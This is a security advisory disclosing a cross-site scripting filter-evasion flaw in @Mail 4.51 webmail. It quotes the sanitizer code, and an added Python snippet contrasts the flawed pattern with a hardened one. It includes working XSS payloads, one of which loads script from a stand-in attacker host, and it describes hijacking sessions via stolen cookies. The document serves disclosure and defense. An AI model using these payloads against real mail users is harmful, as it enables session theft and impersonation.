
Netragard Security Advisory 2006-12-06

Posted Dec 22, 2006
Authored by Netragard | Site netragard.com

Netragard, L.L.C. Advisory - @Mail version 4.51 does not properly sanitize email, allowing cross-site scripting attacks.

tags | advisory, xss
SHA-256 | 39e68d57bada5a83cf9b09964668a0c6d5d4d57328013bb0836d4cd7e2938ac1


******************** Netragard, L.L.C Advisory ********************


Strategic Reconnaissance Team

------------------------------------------------
http://www.netragard.com -- "We make I.T. Safe."





[POSTING NOTICE]
----------------------------------------------------------------------
If you intend to post this advisory on your web page please create a
clickable link back to the original Netragard advisory as the contents
of the advisory may be updated.

<a href=http://www.netragard.com/html/recent_research.html>
Netragard Research
</a>





[About Netragard]
----------------------------------------------------------------------
Netragard is a unique I.T. Security company whose services are
fortified by continual vulnerability research and development. This
ongoing research, which is performed by our Strategic Reconnaissance
Team, specifically focuses on Operating Systems, Software Products and
Web Applications commonly used by businesses internationally. We apply
the knowledge gained by performing this research to our professional
security services. This in turn enables us to produce high quality
deliverables that are the product of talented security professionals
and not those of automated scanners and tools. This advisory is the
product of research done by the Strategic Reconnaissance Team.





[Advisory Information]
----------------------------------------------------------------------
Contact : Adriel T. Desautels
Researcher : Philippe C. Caturegli
Advisory ID : NETRAGARD-20061206
Product Name : @Mail
Product Version : 4.51
Vendor Name : Calacode
Type of Vulnerability : XSS with filter evasion technique.
Effort : Easy

----------------------------------------------------------------------
Netragard Security Note:

Source code obfuscation does not reduce the risk profile of an
application: it has no effect on the vulnerabilities that exist within
that application. The @Mail code was obfuscated using basic obfuscation
techniques.





[Product Description]
----------------------------------------------------------------------
"@Mail is a feature rich Email Solution, providing a complete WebMail
interface for accessing email-resources via a web-browser or wireless
device."


-- http://www.atmail.com --





[Technical Summary]
----------------------------------------------------------------------
@Mail does not properly sanitize email. While @Mail does prepend a
DEFANGED_ marker to the HTML tags it detects, it does not detect tags
written as <SCRIPT/XSS>. This failure makes @Mail vulnerable to
Cross-site Scripting Attacks ("XSS") via filter evasion.





[Technical Details]
----------------------------------------------------------------------
@Mail renders HTML emails by default. (Note: we did not find a way to
disable this feature.) The emails that are received are parsed by the
following code located in Global.pm which disarms basic XSS attacks.





-------8<------- SNIP Global.pm line 626 -> 635 SNIP -------8<-------
my ( $I1I11I11I11IIIII, $I1I111I1111II1II );
$_ = $I1111II1II1II1II->II1II1I11IIII111($I1I1II1II1I11II1);
# Prefix DEFANGED_ to dangerous tag names, but only when the name is
# followed by whitespace or '>': a '/' after the name is not matched.
if (/</) {
    s/<(META|APP|SCRIPT|OBJECT|EMBED|FRAME|IFRAME|BASE|BODY)(\s|>)/<DEFANGED_$1$2/gi;
    # Neutralise inline event handler names (onLoad, onClick, ...).
    s/On(Abort|Blur|Change|Click|DblClick|DragDrop|Error|Focus|KeyDown|KeyPress|KeyUp|Load|MouseDown|MouseMove|MouseOut|MouseOver|MouseUp|Move|Reset|Resize|Select|Submit|Unload)/DEFANGED_On$1/gi;
}
# Decode decimal and hex numeric character references that appear
# inside quoted attribute values.
if (/["\047][^"\047\s]*&#x?[1-9][0-9a-f]/i) {
    while (/["\047][^"\047\s]*&#((4[6-9]|5[0-8]|6[4-9]|[78][0-9]|9[07-9]|1[0-1][0-9]|12[0-2]))/) {
        $I1I111I1111II1II = chr($1);
        s/&#$1;?/$I1I111I1111II1II/g;
    }
    while (/["\047][^"\047\s]*&#(x(2[ef]|3[0-9a]|4[0-9a-f]|5[0-9a]|6[1-9a-f]|7[0-9a]))/i) {
        $I1I111I1111II1II = chr( hex("0$1") );
        s/&#$1;?/$I1I111I1111II1II/gi;
    }
}   # closing braces added here; they fall outside the quoted line range
-------8<------- SNIP Global.pm line 626 -> 635 SNIP -------8<-------

The above code replaces <SCRIPT> with <DEFANGED_SCRIPT>, but the
protection this filtering provides can be defeated. The pattern only
recognises a tag name that is followed by whitespace or ">", whereas
most web browsers treat any non-alphanumeric character after an HTML
tag name as terminating that name, i.e. as if it were whitespace. An
attacker can use this mismatch to attack @Mail users.

Example:

"\s" matches any whitespace character (space and tab, as well as \n
and \r). "<SCRIPT>" is therefore defanged by the above sanitization,
but "<SCRIPT/XSS>" is not, because "/" is neither whitespace nor ">".

When "<SCRIPT/XSS>" reaches a web browser it is interpreted as
"<SCRIPT>" and executed: the "/XSS" is treated as whitespace by the
browser. This is a very common filter evasion technique.
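The defanging pattern from the Global.pm snip re-implemented in Python next to a hardened variant, as an added example that is not part of the advisory or of @Mail's code; the function and sample names are assumptions, and the inputs are the advisory's own test strings plus a constructed decoy tag:

```python
import re

# Tag names the original Global.pm filter defangs (from the advisory's snip).
TAGS = "META|APP|SCRIPT|OBJECT|EMBED|FRAME|IFRAME|BASE|BODY"

# Original @Mail 4.51 pattern: the tag name must be followed by whitespace
# or '>'. Anything else after the name (e.g. '/') leaves the tag untouched.
ORIGINAL_RE = re.compile(r"<(" + TAGS + r")(\s|>)", re.IGNORECASE)

# Hardened pattern: the tag name may be followed by any non-alphanumeric
# character or the end of input, which is where a browser's tokenizer
# ends a tag name. Alphanumerics are excluded so <SCRIPTED> is not touched.
HARDENED_RE = re.compile(r"<(" + TAGS + r")(?![A-Za-z0-9])", re.IGNORECASE)


def defang_original(html: str) -> str:
    """Re-implementation of the first substitution in the Global.pm snip."""
    return ORIGINAL_RE.sub(r"<DEFANGED_\1\2", html)


def defang_hardened(html: str) -> str:
    """Same intent, but closes the gap for non-whitespace separators."""
    return HARDENED_RE.sub(r"<DEFANGED_\1", html)


def tag_name_as_browser_sees_it(fragment: str) -> str:
    """Tag name a browser extracts from a '<...' fragment: the run of
    alphanumerics after '<', ended by whitespace, '/', '>' or anything else."""
    m = re.match(r"<([A-Za-z][A-Za-z0-9]*)", fragment)
    return m.group(1).upper() if m else ""


# Constructed sample bodies: the advisory's strings plus a benign decoy tag.
SAMPLES = {
    "plain": "<SCRIPT>alert(1)</SCRIPT>",
    "evasion": "<SCRIPT/XSS src=//www.netragard.com/xss.js></SCRIPT>",
    "decoy": "<SCRIPTED>not a script tag</SCRIPTED>",
}

if __name__ == "__main__":
    for name, body in SAMPLES.items():
        print(name, "browser tag:", tag_name_as_browser_sees_it(body))
        print("  original:", defang_original(body))
        print("  hardened:", defang_hardened(body))
```

A blocklist regex stays brittle even when hardened; tokenizing the mail body with an HTML parser and allowlisting tags and attributes is the durable fix.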


The following code "<SCRIPT/XSS src=//attacker.com/xss.js></SCRIPT>"
will then be executed when rendering an email with @Mail Webmail.

Please note that the email parser also replaces http:// with an <a
href=..., which would break up the XSS payload, but most browsers
resolve a scheme-relative "//" URL as "http://" inside script tags
(verified in IE and Firefox).

This XSS attack allows the attacker to retrieve the victim's cookie and
impersonate the victim by replacing the session ID in their own cookie
(verified).





[Proof Of Concept]
----------------------------------------------------------------------
Send an HTML email to an @Mail user with the following code embedded.

<SCRIPT/XSS src=//www.netragard.com/xss.js></SCRIPT>

*** The code above will display an alert if vulnerable ***

Note:
Netragard's Strategic Reconnaissance Team was able to use this issue
to hijack an @Mail user's session.





[Vendor Status]
----------------------------------------------------------------------
Vendor Notified on 12/06/06
Vendor responded after 2 more notification attempts
Vendor issued a patch.
Vendor Comments (below):


"Just to confirm the first advisory you sent, NETRAGARD-20061206, has
already been fixed and included in the recent @Mail 4.61 patch for clients."






[Disclaimer]
---------------------http://www.netragard.com-------------------------
Netragard, L.L.C. assumes no liability for the use of the information
provided in this advisory. This advisory was released in an effort to
help the I.T. community protect themselves against a potentially
dangerous security hole. This advisory is not an attempt to solicit
business.

<a href="http://www.netragard.com">
http://www.netragard.com
</a>

